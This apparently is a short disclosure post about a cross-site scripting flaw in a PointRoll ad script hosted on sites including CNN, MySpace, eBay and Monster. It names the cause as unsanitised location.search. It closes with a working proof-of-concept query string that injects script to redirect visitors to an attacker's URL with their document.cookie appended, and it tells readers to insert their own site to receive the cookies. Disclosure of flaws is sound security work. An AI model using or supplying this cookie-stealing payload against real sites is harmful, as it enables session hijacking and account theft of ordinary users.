A cross-site scripting vulnerability has been discovered on multiple websites which use ads provided by Pointroll.<br>
<br>
The following list is a subset of the websites which contain the vulnerability:<br>
<a class="l" target="_blank" title="http://www.cnn.com/pointroll/PointRollAds.htm" href="http://www.cnn.com/pointroll/PointRollAds.htm">http://www.cnn.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.myspace.com/pointroll/PointRollAds.htm" href="http://www.myspace.com/pointroll/PointRollAds.htm">http://www.myspace.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.friendster.com/pointroll/PointRollAds.htm" href="http://www.friendster.com/pointroll/PointRollAds.htm">http://www.friendster.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://archive.gamespy.com/pointroll/PointRollAds.htm" href="http://archive.gamespy.com/pointroll/PointRollAds.htm">http://archive.gamespy.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.monster.com/pointroll/PointRollAds.htm" href="http://www.monster.com/pointroll/PointRollAds.htm">http://www.monster.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.allmusic.com/pointroll/PointRollAds.htm" href="http://www.allmusic.com/pointroll/PointRollAds.htm">http://www.allmusic.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.pcworld.com/pointroll/PointRollAds.htm" href="http://www.pcworld.com/pointroll/PointRollAds.htm">http://www.pcworld.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.10best.com/pointroll/PointRollAds.htm" href="http://www.10best.com/pointroll/PointRollAds.htm">http://www.10best.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://www.askmen.com/pointroll/PointRollAds.htm" href="http://www.askmen.com/pointroll/PointRollAds.htm">http://www.askmen.com/pointroll/PointRollAds.htm</a><br>
<a class="l" target="_blank" title="http://pages.ebay.com/pointroll/PointRollAds.html" href="http://pages.ebay.com/pointroll/PointRollAds.html">http://pages.ebay.com/pointroll/PointRollAds.html</a><br>
<br>
The above pages include a script at <a href="http://pointroll.com">pointroll.com</a> which is the root of
the vulnerability. The vulnerability arises from the use of
location.search without sanitizing the query.<br>
<br>
The following is a proof of concept which works in Firefox. This should
be placed onto the end of any of the above URLs, obviously. [URL]
should be replaced by your website URL, such as <a class="l" target="_blank" title="http://www.foo.com/bar.php," href="http://www.foo.com/bar.php,">http://www.foo.com/bar.php,</a> and [LENGTH+1] should be the length of your website URL + 1.
<br>
<br>
?pub=[URL]?&amp;redir=%27%3E%3Cscript%3Ewindow.location=location.search.substring(5,[LENGTH+1]).concat(document.cookie)%3C/script%3E&amp;ad=g235e20051011164320